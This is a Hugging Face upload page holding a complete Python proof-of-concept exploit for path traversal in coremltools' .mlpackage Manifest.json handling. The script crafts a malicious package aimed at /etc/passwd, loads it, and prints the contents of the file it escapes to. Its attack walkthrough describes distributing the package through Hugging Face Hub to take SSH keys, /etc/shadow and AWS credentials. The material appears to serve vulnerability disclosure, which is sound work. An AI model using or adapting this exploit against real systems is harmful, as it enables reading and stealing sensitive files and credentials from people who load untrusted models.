Upload poc_coreml_path_traversal.py with huggingface_hub
Browse files- poc_coreml_path_traversal.py +206 -0
poc_coreml_path_traversal.py
ADDED
|
@@ -0,0 +1,206 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
PoC: Path Traversal via Manifest.json in Core ML .mlpackage Model Bundles
|
| 3 |
+
==========================================================================
|
| 4 |
+
|
| 5 |
+
Vulnerability: The `path` field inside Manifest.json's itemInfoEntries is
|
| 6 |
+
concatenated with the package's Data/ directory using std::filesystem::path
|
| 7 |
+
operator/ (ModelPackage.cpp line 466) with NO sanitization or containment
|
| 8 |
+
check. A relative path containing "../" sequences escapes the package
|
| 9 |
+
directory entirely.
|
| 10 |
+
|
| 11 |
+
The validation at line 308 only calls std::filesystem::exists() on the
|
| 12 |
+
resulting joined path -- it verifies the *target* exists but never checks
|
| 13 |
+
that the resolved path is still inside the .mlpackage bundle.
|
| 14 |
+
|
| 15 |
+
When coremltools.utils.load_spec() is called on a malicious .mlpackage,
|
| 16 |
+
it calls getRootModel().path(), which returns the traversed path. Then
|
| 17 |
+
load_spec() opens that path with open(specfile, "rb") and reads its
|
| 18 |
+
contents (utils.py line 270-271), achieving arbitrary file read.
|
| 19 |
+
|
| 20 |
+
Impact: Any application or pipeline that loads untrusted .mlpackage files
|
| 21 |
+
(e.g., from Hugging Face Hub, user uploads, CI/CD) can be tricked into
|
| 22 |
+
reading arbitrary files from the host filesystem.
|
| 23 |
+
|
| 24 |
+
Usage:
|
| 25 |
+
python poc_coreml_path_traversal.py
|
| 26 |
+
# Creates ./malicious.mlpackage/ with a crafted Manifest.json
|
| 27 |
+
# Then demonstrates the path traversal by loading it with coremltools
|
| 28 |
+
"""
|
| 29 |
+
|
| 30 |
+
import json
|
| 31 |
+
import os
|
| 32 |
+
import sys
|
| 33 |
+
import shutil
|
| 34 |
+
|
| 35 |
+
|
| 36 |
+
def create_malicious_mlpackage(output_dir="malicious.mlpackage",
                               traversal_target="../../../../etc/passwd"):
    """
    Build a .mlpackage directory whose Manifest.json carries a path
    traversal payload in its itemInfoEntries.

    Layout produced:
        <output_dir>/
            Manifest.json
            Data/            (left empty -- the manifest entry points outside)

    The manifest's "path" value (e.g. "../../../../etc/passwd") is later
    joined by ModelPackage with <package>/Data/ via filesystem operator/,
    so it resolves to a location outside the bundle.

    Returns the absolute path of the created package directory.
    """
    # Start from a clean slate if a previous run left the package behind.
    if os.path.exists(output_dir):
        shutil.rmtree(output_dir)

    # Lay out the bundle skeleton: just an (empty) Data/ subdirectory.
    os.makedirs(os.path.join(output_dir, "Data"), exist_ok=True)

    # The "path" field below is the entire exploit.  ModelPackage.cpp joins
    # it unsanitized:
    #     auto path = m_packageDataDirPath / itemInfoEntry->getString("path");
    # so "../../../../etc/passwd" resolves to /etc/passwd.  The exists()
    # validation checks only that the *target* exists, not containment.
    item_entry = {
        "path": traversal_target,
        "name": "model.mlmodel",
        "author": "com.attacker.evil",
        "description": "Proof of concept path traversal",
    }
    manifest = {
        "fileFormatVersion": "1.0.0",
        "rootModelIdentifier": "malicious-item-id",
        "itemInfoEntries": {"malicious-item-id": item_entry},
    }

    with open(os.path.join(output_dir, "Manifest.json"), "w") as fh:
        json.dump(manifest, fh, indent=2)

    abs_dir = os.path.abspath(output_dir)
    print(f"[+] Created malicious .mlpackage at: {abs_dir}")
    print(f"[+] Manifest.json written with traversal path: {traversal_target}")
    print(f"[+] Resolved path will be: <package>/Data/{traversal_target}")

    return abs_dir
| 92 |
+
|
| 93 |
+
def demonstrate_path_leak(package_path):
    """
    Load the crafted package with coremltools and show that the root
    model's resolved path escapes the package directory (and, when the
    target file exists, that its contents can be read).

    Falls back to a static description of the vulnerable data flow when
    coremltools is not installed.

    :param package_path: path to the .mlpackage directory to load
    """
    print("\n[*] Attempting to load malicious .mlpackage with coremltools...")
    print("[*] This demonstrates the path traversal in getRootModel().path()")

    try:
        from coremltools.libmodelpackage import ModelPackage

        # Core of the vulnerability: ModelPackage parses Manifest.json, and
        # getRootModel() -> findItem() joins
        #     m_packageDataDirPath / <unsanitized manifest "path">
        pkg = ModelPackage(package_path)
        root_model = pkg.getRootModel()
        resolved_path = root_model.path()

        print(f"[!] getRootModel().path() resolved to: {resolved_path}")

        # Containment check.  BUGFIX: the previous str.startswith() prefix
        # test was itself unsafe ("/tmp/pkg-other" matches "/tmp/pkg");
        # compare canonicalized paths with os.path.commonpath instead.
        real_resolved = os.path.realpath(resolved_path)
        real_package = os.path.realpath(package_path)
        escaped = os.path.commonpath([real_resolved, real_package]) != real_package

        if escaped:
            print("[!] PATH TRAVERSAL CONFIRMED!")
            print(f"    Package dir: {real_package}")
            print(f"    Resolved to: {real_resolved}")
            print("    The path has escaped the package directory.")
        else:
            print("[-] Path did not escape (unexpected).")

        # In a real attack, load_spec() would now do
        #     open(resolved_path, "rb").read()
        # i.e. an arbitrary file read.  Demonstrate it:
        if os.path.exists(resolved_path):
            print("\n[!] File exists at traversed path. Reading first 5 lines:")
            with open(resolved_path, "r") as f:
                for i, line in enumerate(f):
                    if i >= 5:
                        print("    ...")
                        break
                    print(f"    {line.rstrip()}")
        else:
            print(f"\n[*] Target file does not exist at: {resolved_path}")
            print("[*] But the path traversal is still proven by the resolved path.")

    except ImportError:
        print("[!] coremltools not installed -- showing static analysis instead.")
        print("[*] When loaded, the Manifest.json 'path' field flows to:")
        print("    ModelPackage.cpp:466 -> m_packageDataDirPath / attacker_path")
        print("    utils.py:265 -> getRootModel().path() => opens the file")
        print("[*] No canonicalization or containment check exists.")

    except Exception as e:
        # ModelPackage's validation calls exists() on the traversed path; if
        # the target is missing the load raises here, but the join logic is
        # still exploitable whenever the target file exists on the victim.
        print(f"[!] Exception during load: {e}")
        print("[*] This may indicate the target file doesn't exist, but")
        print("    the path traversal logic is still exploitable when the")
        print("    target file does exist on the victim's system.")
|
| 157 |
+
|
| 158 |
+
def demonstrate_huggingface_scenario():
    """Print a walkthrough of the realistic Hugging Face Hub attack vector."""
    banner = "=" * 70
    print("\n" + banner)
    print("ATTACK SCENARIO: Hugging Face Hub")
    print(banner)
    print("""
1. Attacker creates a Hugging Face model repository containing a
   malicious .mlpackage directory (it's just a directory with JSON).

2. Victim runs:
       from huggingface_hub import hf_hub_download
       model_path = hf_hub_download("attacker/evil-model", ...)
       # or uses coremltools directly:
       import coremltools
       model = coremltools.models.MLModel("downloaded.mlpackage")

3. coremltools calls load_spec() -> ModelPackage(path).getRootModel().path()
   which resolves the traversal path and opens the target file.

4. Attacker exfiltrates sensitive data:
   - /etc/passwd, /etc/shadow (system info)
   - ~/.ssh/id_rsa (SSH keys)
   - ~/.aws/credentials (cloud credentials)
   - Environment variable files, config files, etc.

The .mlpackage format is a plain directory, not a compressed archive,
so Hugging Face's git-based storage will host it without modification.
""")
|
| 189 |
+
|
| 190 |
+
if __name__ == "__main__":
    banner = "=" * 70
    print(banner)
    print("PoC: Core ML .mlpackage Path Traversal via Manifest.json")
    print(banner)

    # Build the crafted package (default payload targets /etc/passwd).
    package_path = create_malicious_mlpackage()

    # Show the traversal in action against the package just created.
    demonstrate_path_leak(package_path)

    # Describe the realistic delivery vector.
    demonstrate_huggingface_scenario()

    # Leave the artifact on disk for inspection; tell the user how to
    # remove it.
    print("\n[*] Malicious .mlpackage left at:", package_path)
    print("[*] Run: rm -rf malicious.mlpackage to clean up.")